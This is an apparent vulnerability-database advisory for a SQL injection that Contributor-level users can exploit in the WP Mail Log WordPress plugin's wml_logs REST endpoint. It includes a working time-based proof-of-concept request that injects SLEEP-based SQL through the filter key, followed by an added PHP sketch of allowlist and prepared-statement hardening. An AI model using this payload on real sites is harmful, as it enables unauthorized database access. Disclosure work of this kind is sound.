WordPress Plugin Vulnerabilities
WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.
Proof of Concept
Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the injected SQL.

await wp.apiFetch({
  path: 'wml/v1/wml_logs',
  method: 'POST',
  data: {
    pageSize: 10,
    filter: {
      1: {
        key: '1=(SELECT IF(1=1,SLEEP(10),\'a\')))#',
        operator: '',
        value: ''
      }
    }
  }
});
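The request above puts SQL in the filter's key field. As an added example (not the plugin's code or its actual patch), the following sketch handles the same filter structure by checking key and operator against fixed allowlists and binding value and pageSize through $wpdb->prepare(). The function names, the column list and the table name are assumptions.

```php
<?php
// Added example: hardened handling of the {key, operator, value} filter structure.
// Column names, table name and function names are hypothetical.

const WML_FILTER_COLUMNS   = ['id', 'subject', 'receiver', 'status', 'created_at'];
const WML_FILTER_OPERATORS = ['=' => '=', '!=' => '!=', 'like' => 'LIKE'];

/**
 * Turn the request's filter array into a WHERE fragment with placeholders
 * plus the values to bind. Throws on any key or operator outside the allowlists.
 */
function wml_build_where(array $filters, callable $esc_like): array {
    $clauses = [];
    $args    = [];
    foreach ($filters as $f) {
        $key = is_array($f) && is_string($f['key'] ?? null) ? $f['key'] : '';
        $op  = is_array($f) && is_string($f['operator'] ?? null) ? strtolower($f['operator']) : '';
        if (!in_array($key, WML_FILTER_COLUMNS, true)) {
            throw new InvalidArgumentException('unknown filter key');
        }
        if (!isset(WML_FILTER_OPERATORS[$op])) {
            throw new InvalidArgumentException('unknown filter operator');
        }
        $value = is_scalar($f['value'] ?? null) ? (string) $f['value'] : '';
        if ($op === 'like') {
            // Escape LIKE wildcards in user input before adding our own.
            $value = '%' . $esc_like($value) . '%';
        }
        // The identifier comes from the allowlist; the value is only ever bound.
        $clauses[] = "`$key` " . WML_FILTER_OPERATORS[$op] . ' %s';
        $args[]    = $value;
    }
    return [$clauses ? implode(' AND ', $clauses) : '1=1', $args];
}

function wml_query_logs(wpdb $wpdb, array $filters, $page_size): array {
    [$where, $args] = wml_build_where($filters, [$wpdb, 'esc_like']);
    $args[] = max(1, min(100, (int) $page_size)); // clamp pageSize to 1..100
    $table  = $wpdb->prefix . 'wml_logs';          // hypothetical table name
    $sql    = "SELECT * FROM `$table` WHERE $where ORDER BY id DESC LIMIT %d";
    return $wpdb->get_results($wpdb->prepare($sql, $args), ARRAY_A);
}
```

With this shape, the key string from the request above is not in the allowlist, so wml_build_where() throws before any SQL is assembled; a REST callback would catch the exception and return a 400 response.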
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-28
Added
2023-11-28
Last Updated
2023-11-28